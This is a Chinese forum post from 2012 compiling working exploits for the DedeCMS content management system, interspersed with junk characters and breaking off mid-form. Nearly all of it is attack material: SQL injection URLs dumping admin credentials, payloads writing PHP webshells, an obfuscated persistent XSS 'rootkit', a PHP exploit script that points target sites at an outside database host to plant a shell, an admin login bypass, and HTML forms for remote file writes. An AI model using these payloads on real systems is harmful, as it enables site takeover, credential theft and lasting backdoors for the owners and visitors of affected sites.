dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞+ q: L* Z5 x$ z& V
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
: q/ Z/ }( E$ R; A4 N% a! E
. X5 K5 N; s: }7 h4 l$ }
( p2 v6 e% e1 R1 ~: z& Z
3 z! h$ k! x$ n9 U# n: p
0 s1 S+ Z6 I/ R& t3 h" F- b8 Y! i6 W
% x4 ?+ i  `% k& E" k& r
, Q) w& }$ O+ Z7 P$ J4 C; x: J
( v6 U5 }- h( R6 X4 d3 ?4 S
$ B5 B) w7 j+ {+ `5 N! EDedeCms v5.6 嵌入恶意代码执行漏洞
( W* b( t4 m6 b8 Y, K( M注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
. T% w" Z9 m2 ]+ N8 T  x发表后查看或修改即可执行
1 ]- J  d/ r1 N+ o' f  la{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}) @, i1 ]6 B9 H$ d1 O
生成x.php 密码xiao，直接生成一句话。
$ m3 R$ [: O2 t
, x/ N/ J. x( _+ ~; T* H. ^
% P* b9 s: a9 S% B; a2 i
! u# i" k2 Q: u* f" f- w' G
8 X% w. h5 J0 u0 T& _. Z0 Z0 ~7 ^
' W3 z% l$ v& j- D; g* }- E- F/ I6 X
' [0 O! g- M5 j; \  c

! C+ R, Z- T& n3 p) T$ xDede 5.6 GBK SQL注入漏洞
( T7 ^4 l& J; E# a. a3 ^http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';. T- z; `+ F! ~3 o
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞2 ]! ?% G* T0 k! E
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
+ w! u  h9 R( F3 i
, X- D2 r5 F$ d, Z2 N9 ^. g. U8 R! j/ x2 Q
# a7 J7 T  l; q! b4 y+ F

7 Y# O. a3 i7 Z1 @/ r- J- D. c7 J) ~
0 b5 c$ n+ ]; R. S
( Z7 U( Z( l0 _/ j* bDEDECMS 全版本 gotopage变量XSS漏洞
; I# ]) o6 H2 X) _: N( i; u  u1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
" c) f4 O* D+ X% {http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
6 |4 W9 Z/ @2 O' o* b  q1 j' i
9 s) ~5 u  v  o8 Y/ M. T$ f0 v
& Y7 T4 q% w' t: C, {2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。 " {! |/ R& o3 w3 R- T) B/ C
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell
7 e. q1 q0 O# a2 M% ^$ _2 A#!usr/bin/php -w
0 |8 i) T" U- P$ N$ l! J0 T<?php; @! G3 [  x6 |/ i/ e$ U
error_reporting(E_ERROR);
" _  U1 ]: ^- w  d; l" q+ C' eset_time_limit(0);- u: M' Y  a6 s) |( ^) A. ^+ X
print_r('
7 q+ j, I* o9 v- S' G# NDEDEcms Variable Coverage! ?2 e  z8 ]. `, k
Exploit Author: www.heixiaozi.comwww.webvul.com
);& {' ?& N2 F! H
echo "\r\n";
: `2 j+ V2 J9 G7 M- Y& Lif($argv[2]==null){
2 V8 s: x+ u0 ^! [; ?/ w1 K6 D" Cprint_r('
2 F) Z' ?# A9 d  L* H$ ~+---------------------------------------------------------------------------+
& N3 \$ S7 k4 m! X! B# |8 u, Z, Z; RUsage: php '.$argv[0].' url aid path8 n5 W6 ~$ J6 I9 b! }
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/+ \. i+ b% m* [+ P3 P
Example:. N0 T# H  b: [* `4 t( E
php '.$argv[0].' www.site.com 1 old
, G$ \" R! J# l) X+ O+---------------------------------------------------------------------------+  U3 g% Z- x4 Z; c! t. {
');
2 p' q9 @6 `0 H. F- Cexit;! ]- U* e. S$ p0 I
}; O  w7 q( o3 T
$url=$argv[1];- b. T1 q% w( N: U9 t
$aid=$argv[2];2 ?9 l! m! s; f' l
$path=$argv[3];7 B1 `4 S+ C  u5 O1 x# [: G) m
$exp=Getshell($url,$aid,$path);
  ~! i  l$ D" q& w7 Z, h7 Bif (strpos($exp,"OK")>12){
: M# |5 ?8 m9 A* `3 ]echo "9 ?, D* N2 `4 s4 O
Exploit Success \n";4 {7 b2 G2 k% z& n$ G( x
if($aid==1)echo "4 n1 s  {$ H" b& L/ s; }
Shell:".$url."/$path/data/cache/fuck.php\n" ;4 K! S6 n1 e) e# i+ s: l- o" Z

5 D. q( J- h4 P7 w5 g: Z. L2 ]) q9 J4 T! k8 P* K* G' x
if($aid==2)echo "
; e) F3 Y0 V8 [; LShell:".$url."/$path/fuck.php\n" ;
, a" A( d; @/ F( ^1 }( f8 c7 U  t  c3 Y
) L/ r% w* I- V! W% {1 [3 L2 W
if($aid==3)echo "- }' f! W$ t$ j7 {- @5 ~" K
Shell:".$url."/$path/plus/fuck.php\n";
: u3 N6 ?) K: p7 Z: X
! D) B" I: U+ {  f3 |4 p
' U/ o" e* u- ^2 w. M}else{' _* v. p: g5 m' [- \4 J
echo ": l! _8 w" B! ~: Q* o2 U/ Y7 L
Exploit Failed \n";( e( Y& e0 ], r( Q
}% h! ~. V: k  }' @4 M
function Getshell($url,$aid,$path){- V1 W! `' `! d3 X% Q1 O9 _/ H2 S
$id=$aid;
. \4 g4 Y4 j3 v0 a3 b$host=$url;# {8 W3 H- f! W& @
$port="80";0 `0 R; J4 N7 D5 H8 W# T$ X
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";0 |7 x  s2 t& ?6 V( b/ j, \% u( z
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
# R4 u& {4 f9 o2 j. W$data .= "Host: ".$host."\r\n";, n4 l  [% c# \' ]" m! v8 u* Q
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";2 S2 e6 S. K, p% `7 u' u" R# p5 t( v
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
; Q/ C) {1 x* h5 @$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
/ u! n( l) ~6 W: J7 E//$data .= "Accept-Encoding: gzip,deflate\r\n";
) S" m. `! d$ K0 i  \5 [5 U$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
8 z0 W! I1 G+ r' }6 f- {) k1 L' F$data .= "Connection: keep-alive\r\n";' [8 H8 ?( K: w& q5 |1 \
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";) I: J2 f- M( s
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
- j/ E8 A6 _  t: y5 k+ P$data .= $content."\r\n";5 T1 c" P# t* x% n3 Q, }
$ock=fsockopen($host,$port);5 [  ]$ s4 q$ Y  j* x2 \) I' }
if (!$ock) {
- a$ Y; P' e: o+ o0 d- wecho "
- J- r& k3 F4 q" cNo response from ".$host."\n";5 U7 Q) S4 Q5 Y, ^
}- O# M- Q" `$ O7 [' J! Q
fwrite($ock,$data);  q6 R( x+ p' S1 m
while (!feof($ock)) {
1 c5 S* [2 I0 i6 L( B: P$exp=fgets($ock, 1024);+ u* u' D4 g$ W9 P1 C+ h
return $exp;
. c% _, m2 Z+ C) V* b7 q}
" r' `7 x9 `7 M9 U+ k4 L}; @- [( i8 F! }
% [6 U. N0 d2 b+ g2 V

5 V4 o; u, s$ t- X" H) o, I6 f?># ^" l4 \% h3 d  _# d' ^" o

, q" T, y1 a8 q; u$ M- T, G2 D0 j# P& H" p; @, R8 p1 c
' ?/ }- N! x) d4 T1 A

: e* S% U  w3 k4 Y' q
9 Z- L$ W% O1 Z) D+ O6 s+ N- p+ Q! Q  c. x) @, U

. |2 ^& L: P) [
9 ^$ i# l: D/ G1 }
) t- n( r* w2 |1 C) {1 b4 j' c
- R( m, M2 p0 R0 D5 S# {- R. ZDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
9 d, w: V$ V- {; shttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root% f7 b- }" M- S& j8 s
% M# Z. K& n6 [/ Y( H7 V; a* L
( t/ \' K# D. E" @( o9 ~
把上面validate=dcug改为当前的验证码，即可直接进入网站后台
0 {8 D6 N$ Z+ V# D
6 V0 K9 u2 s) Q5 P1 ^
# Y  a, p  C# y1 d此漏洞的前提是必须得到后台路径才能实现
! N" A& u3 f( [; D3 f, L/ C4 X; T  d& ?

: b# n/ o( M+ I& X1 v; n' m
6 `2 h! }; x1 y% Z2 H8 y) ^8 m' [6 p7 b5 w

$ F/ x0 D) _+ `. m6 h* a
+ [6 t- Z9 S6 h( Y9 U! Y7 c7 e, r5 r

8 Q3 k- U1 J! X6 N
+ A7 M8 w- z1 y, I' [* N1 \2 ?) E; D: d/ N' k( P
Dedecms织梦标签远程文件写入漏洞$ s! y0 q* ?& ~$ Y& z  M' m
前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');! t: m, d+ A5 g# |6 I

+ U, S5 l. H5 j% V4 `, `5 N$ Q- \$ @3 X3 D) h4 c
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
( G7 s, g4 w) H* M7 ?: r" s<form action="" method="post" name="QuickSearch" id="QuickSearch">
) U) O$ n8 ^2 N( c' I<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />. z: k1 [4 C& ~8 I6 }
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />. v: G- Z- M$ i$ M' I) I# Y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
8 o3 m* l2 v/ N6 {& }<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />2 r6 }3 q* T. N; W
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />6 H( p( y, ^; }  L6 P8 {
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />3 l# B: C1 m& X' w; E
<input type="text" value="true" name="nocache" style="width:400">  C$ n0 V5 Q. E- Q) T3 i1 V4 N- H2 B# `
<input type="submit" value="提交" name="QuickSearchBtn"><br />
6 G8 P& e7 B: S</form>
( t- ]4 x% w; q, m& i0 M% F<script># t' x7 F" A: R* \( b0 W
function addaction()- I! n' w( |" F3 `7 {! _6 o
{' M+ g9 i2 J* w4 d( _
document.QuickSearch.action=document.QuickSearch.doaction.value;# r/ ~- @- I% ~2 |6 \! U
}
5 s: }3 S; l3 D/ R0 [' _5 K! I</script>
# o0 w, ]: X. e/ O" O5 ^+ w# g0 r; H1 P6 }3 {; M! w
" R* o: g+ ]: I8 M- s
0 N( G8 F1 e8 f' q
( F3 T/ L- [9 I9 o

$ V2 y0 l" k* G$ e1 ^! W5 j$ I7 f1 U7 B' @2 y0 Y2 x0 L% k& u

3 W% G7 d& c  C( u2 V2 s5 d5 L* ~7 l0 {  B' s8 u

' ?9 J5 J: L8 t9 G" t6 [/ n
  n1 M$ K# q9 x: @DedeCms v5.6 嵌入恶意代码执行漏洞. E) g" a) q+ O6 x& }: ~0 [9 Q' z
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行4 k9 X* \# s' ]1 A, m# ?! M
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}- p* e) i7 o) F' r% j6 _! @+ b6 z- u
生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
% `" a& X% A/ XDedecms <= V5.6 Final模板执行漏洞) B9 Z' b/ C3 E2 y- ~. g, `
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：# E. D. V$ E. }8 T6 C
uploads/userup/2/12OMX04-15A.jpg* b7 K' d, d6 b& m  r) i

5 n% i0 r8 q$ @* a( u7 J5 _) d7 }& H9 f, u( t  O3 e
模板内容是（如果限制图片格式，加gif89a）：
1 h( B7 L9 q$ X0 O: a9 ^% p  x{dede:name runphp='yes'}
2 t* p" K; T( e2 Q8 X4 [$ r$fp = @fopen("1.php", 'a');
. i4 L- _) Y7 U0 f' K@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
8 m" E$ e. Y, u3 u- p@fclose($fp);
8 N$ d0 e+ V' [" Z{/dede:name}0 m  V# e; j7 K
2 修改刚刚发表的文章，查看源文件，构造一个表单：% y1 U1 U& G0 {- k% u* j
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
% L$ J. q! d; _<input type="hidden" name="dopost" value="save" />$ D) V* u. Q3 \/ P
<input type="hidden" name="aid" value="2" />
5 E) C! l: }; i0 X. o$ B& y4 }<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
) H1 g8 @6 h, C3 T* I<input type="hidden" name="channelid" value="1" />
* C* g5 P+ O( j- w6 T<input type="hidden" name="oldlitpic" value="" />
) E! z1 j8 k2 ]/ s- z* E<input type="hidden" name="sortrank" value="1275972263" />
- G/ T8 u0 e/ v3 [  Y3 A
) X& H) [, F) i: ~" v) D$ a+ Z$ t, B* W. p$ C7 K" J
<div id="mainCp">
" D+ S6 k; p3 J0 {1 |; D<h3 class="meTitle"><strong>修改文章</strong></h3>
- |: N0 i9 }  V- w( p  a5 k  O- C7 n4 A& X. ]
2 y! J7 B( Z, |1 U1 a
<div class="postForm">
/ L/ _5 A! n  s* q; _<label>标题：</label>& X) A0 h! ~2 ]5 D6 K6 G/ f
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>, {7 g! D$ _" i2 s
7 `3 ]. Z0 ~" D- T- K9 }
/ Y2 Z; [& y6 g$ g
<label>标签TAG：</label>
3 j& F* ]& ?8 {$ O7 z<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)+ Y  x7 Q/ X( h' m+ @

% h( Z' H* P# ^4 f" |) G( A# W9 ~: G& J4 T7 u4 y, u  P; W
<label>作者：</label>
/ B2 v1 N- J! `& i5 @& P<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
; H% h7 B, n8 P! ?( R/ D8 Q6 g8 ^+ y# p8 R: }) b$ k% O* Q
0 m9 B5 ?& F# I# ~) R' S
<label>隶属栏目：</label>' P6 R5 `4 H% p8 j5 c& L
<select name='typeid' size='1'>3 p3 v; X) u3 x& N% e, W- @5 w& ?8 r
<option value='1' class='option3' selected=''>测试栏目</option>
3 r0 Q- Z  s3 F- s</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
/ w( P4 h3 L; x. J0 T) V) d" C! z# ?% F: t! k

! t, S$ G1 ?4 M0 N<label>我的分类：</label>: W+ |! H% A" H6 O: @; E$ E' S
<select name='mtypesid' size='1'>
" N. }$ k3 B  w, \9 I$ Z<option value='0' selected>请选择分类...</option>  z  p5 h+ B! Y0 \5 T( f) b  A
<option value='1' class='option3' selected>hahahha</option>( B2 C. @  _: p( q
</select>
7 k; H" z& v% h: _; _# u
5 y0 O9 I! z) Y8 ~0 X% h8 I4 ^$ V$ C
<label>信息摘要：</label>
6 p+ j  r7 `$ N0 f<textarea name="description" id="description">1111111</textarea>
3 H0 f2 ^6 c, r3 N$ L7 z* c7 o(内容的简要说明)
& n( m; L. x. h2 E# R/ A. A7 p& n) c. w5 F. t1 V; y( ~9 T
( v" N- k$ }0 L6 S9 I+ l8 G
<label>缩略图：</label># o# P7 _" X" t. u- i- k9 ?$ a
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
+ I7 E! m6 V: E6 m- j5 [  y) ]; C% I: Y4 n

1 |: _7 a4 c/ p7 L5 n<input type='text' name='templet'
5 W4 a, n9 [% P0 ]7 N  Pvalue="../ uploads/userup/2/12OMX04-15A.jpg">
0 j0 I$ D$ ]9 Z* t( G<input type='text' name='dede_addonfields'& |, o# |6 r) K( C2 A" Y
value="templet,htmltext;">（这里构造）$ N' Y- M, n, P! |4 @' w& [3 V; z( l
</div>- v( P* M7 i7 g8 X; q( T

' I4 m% W* x6 b2 O6 @- W4 i  k" b/ N, ^1 K& ]! r8 r3 K( |& X! z
$ [4 B7 g& P* ~: t, F1 r1 e
<h3 class="meTitle">详细内容</h3>+ X# s4 s2 C, I& k; K- B  u/ x

/ |) q  J; P+ \  F
- p) I4 f( V- ]( s<div class="contentShow postForm">
0 S$ W4 x  ]  s/ A$ s<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>" x4 F6 t, ~' D1 {' s' {
; @/ d  ]9 k6 A  Y5 G
. ?9 Y# D: \$ c8 _
<label>验证码：</label>
7 N$ _# ^* q, n6 c<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
4 v5 {1 Z- Q0 J; \5 a7 _<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
* G( f( i  H1 V+ C& w& w/ R0 G
, K; O" b0 M- @) s( W
( _+ B+ y! _9 [( p; A' l<button class="button2" type="submit">提交</button>
# b3 p& Y. |# j8 r. a' }0 E. G<button class="button2 ml10" type="reset">重置</button>8 ~; S( S( Q2 \" y* K1 }0 I& S6 N2 P
</div>
! P2 R# q+ V( M% m- ]
7 r' Y% U: z/ K- H6 ?
4 o# L5 u+ S+ M0 g" P8 n</div>+ m! K6 R1 N  V6 u

& `$ o. B3 a* H0 A) J  m# s2 U) b
</form>
2 B5 K# ?2 R' @. I) [8 [
& v9 g; c. ?. [- y3 V& n5 j
$ y( x; b5 v0 A% \提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
, l; n  }4 Y4 Q3 T假设刚刚修改的文章的aid为2，则我们只需要访问：- W9 O$ A  L6 `+ q% N4 f7 M: S. g
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php/ ~+ x8 N9 Z2 P: E
4 M: q! Q. u2 R7 s
8 _1 Q; |/ g6 L

! P$ X6 O0 t- C( B  h+ L# |8 Z) e  r5 ?$ D- ]
. C# e; m8 n  X6 u3 _8 v
# @) R; o, k3 ?' {  _9 F' i
4 H  I! J% i4 s. F6 c5 t

$ G* T  i9 l. j' c# C" ?/ c7 U, {, g- E
  n, m& \- z9 P6 D9 Q' ^' l9 }) @
7 O5 t: R+ q2 o! `3 P

9 E) c- x1 X* j6 Q8 `DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
0 F+ C2 N, d$ h" H# SGif89a{dede:field name='toby57' runphp='yes'}
' A0 U. ]- x% a3 wphpinfo();
# r1 W- g# R) N9 u/ p{/dede:field}
+ g2 s8 O3 g0 K. o2 @保存为1.gif- c/ p/ @4 \/ M. l0 Y! h- f4 g4 Y: o
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
0 u  P- _, h% Q* x( N<input type="hidden" name="aid" value="7" /> 3 ^1 H- |/ ^' E1 W3 w5 v% i
<input type="hidden" name="mediatype" value="1" />
) x  k$ z+ ~3 j2 y7 Q<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> " h9 M& n0 k& y3 e
<input type="hidden" name="dopost" value="save" />
3 y2 k8 `6 q6 h. A<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 3 l# d" L: A% f: `
<input name="addonfile" type="file" id="addonfile"/>
2 g* G+ |$ {( j  B<button class="button2" type="submit" >更改</button> - O. p5 G5 u6 B/ n2 \' c* X& X
</form> 8 ^6 v% T0 `6 r/ ]5 C! S
9 A# D; g5 u8 C) m- n$ x/ S' H
+ V/ x5 K4 r: {6 p* }
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
9 S2 x8 G/ m- ?3 }0 c发表文章，然后构造修改表单如下：
) |% X0 _/ F/ h4 U- l. i7 s3 v% G, E2 y( ~& R3 P3 s; c3 Q9 ~9 P

# S8 R& R2 B! S: ]0 V' g<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 Q6 ?% K. ?4 o4 B/ n0 v# Y<input type="hidden" name="dopost" value="save" />
' J7 J6 Q% l7 d$ @1 `. |8 V<input type="hidden" name="aid" value="2" /> * X" k1 }. \0 {; b% g% y
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 0 N. Z* x$ r2 t" q/ g) a( |2 t
<input type="hidden" name="channelid" value="1" /> " U: i7 o( _9 [' X+ q
<input type="hidden" name="oldlitpic" value="" /> 7 I' K) K& M' a* U1 P* a9 d* r
<input type="hidden" name="sortrank" value="1282049150" />
; ^0 K5 I6 g8 e1 u1 G<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , J. z, z" ]) [  l
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
5 W: j# V' U* F0 N<select name='typeid' size='1'> ! C3 J# [+ q% C! k) \8 ]5 R+ l
<option value='1' class='option3' selected=''>Test</option>
6 F2 G+ s2 j! Z. Q$ S<select name='mtypesid' size='1'>
# e1 Q8 {0 H. t3 w4 ]<option value='0' selected>请选择分类...</option> 8 z* w+ u. }5 B/ e; n0 _) m6 A2 g
<option value='1' class='option3' selected>aa</option></select>
. A* D" E" q1 L/ D5 x; W3 y! s7 z<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
5 [9 x9 q. b1 D8 ^<input type='hidden' name='dede_addonfields' value="templet">
1 q) f$ H) _( s1 ^8 ]0 {% L, D<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> % E8 ~8 @4 B% \' V6 }& L
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
# R7 ~& ]" ?# Q<button class="button2" type="submit">提交</button> ( `# j) G* t/ \* B! V' H4 \
</form># V; |. C0 k& r; B8 X8 r, s/ |
) U8 Z3 H2 @) V* H7 j2 a# x1 s1 U

& b$ x  D8 k4 y4 i1 f0 \
1 R% D9 M6 P% l2 c# C& s
8 ~% o8 J2 j, l, P  R# e
/ z7 r: J% S" J: F8 m! {# n% p2 w" ~9 A# E
+ L- G4 X: q8 q3 S

8 n  X6 {; ^) ^9 J6 s: M# W: ^! L7 l, [3 F  q, A, S1 k4 q

& K3 i2 M0 u+ N3 Z8 Q8 A4 f4 o! z# Y3 b2 H
6 `8 r. C% s2 x7 {9 V6 p
织梦(Dedecms)V5.6 远程文件删除漏洞/ @% o  m- U6 Z, _+ j
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ) z- H0 y  U8 `* t& ^; E5 s, T
http://www.test.com/plus/carbuya ... urn&code=../../
. [, E7 e! `  A7 a) X
; q5 |* S6 I" D% z6 ]% n8 x! h* e# h6 {/ w
0 l! O6 u- ?6 _# Q- P& H7 G9 [
4 D) ~% g8 n; J2 J/ m5 b5 q

* k  X* l# \( J" P/ A4 K& S! T/ W$ e, B

3 [$ g% X0 C; j( T. `9 D" J' p8 m) t
5 ?! s, O2 m% g1 u, F

3 U. E* }( s% u$ x: |4 sDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! U! B  M9 x6 x. splus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`! {0 ~' c0 v! d2 n
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5
: S' ?0 `2 s9 H7 P' D. G- j. J: c0 A$ u0 _
7 Y, z$ c# s/ O- Y  P
+ v: P! H5 h: f6 {, v' k2 J0 k

3 M% @) @6 t7 S) y8 f
# }3 [% h0 k# ?/ p  |# H! t7 |* T. z( b3 ~8 U# E, R
: c* s% o! M8 `
5 L6 {- E: v8 D8 W

/ l( U+ l; t$ P# l% B& m* q6 k# s% Z' w: P. I. b6 }# g8 H
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
. Q" h4 k, h% o, X, b1 f# U, vhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='* E( X" F$ a  Q. {& v

2 p5 u- U9 s% D1 @7 {8 H. Z) z
3 `; Q% X! D" x7 R5 h+ n* o" T
  k! L1 q5 w. F) c& E2 I, H! z! |, Z& R+ o! o! H& l6 h" {
8 v3 y& t' f& k: e5 B5 L

/ U# B9 n- q- b' a( i( `6 r( x1 d/ Z7 `( V& @

/ @4 G* R: l/ |' A% D1 z
+ D$ z3 K7 l  K' p; J: n5 S( D$ E/ B
3 a* c$ |- y7 O1 n织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
; W% Z% D  c+ `7 G$ Q1 U<html># I! C8 C8 H' g$ u, A# Z
<head>
- Y% |! J3 Q4 W. b<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
) O  E8 l! o  b: O$ R</head>
) n3 P' z! H2 B' t: D1 r<body style="FONT-SIZE: 9pt">" \& ^7 S5 n; O
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />1 d. F8 W/ P% T  ~3 l1 {
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>$ b6 P+ w6 l4 }8 @* f8 u
<input type='hidden' name='activepath' value='/data/cache/' />, C6 r5 h% f3 J' r+ _9 ?) t8 y0 M
<input type='hidden' name='cfg_basedir' value='../../' />
$ b" m! n5 I3 T% M9 l+ ^$ r0 f. Q6 v<input type='hidden' name='cfg_imgtype' value='php' />
- R( }8 L& \" ]+ {<input type='hidden' name='cfg_not_allowall' value='txt' />
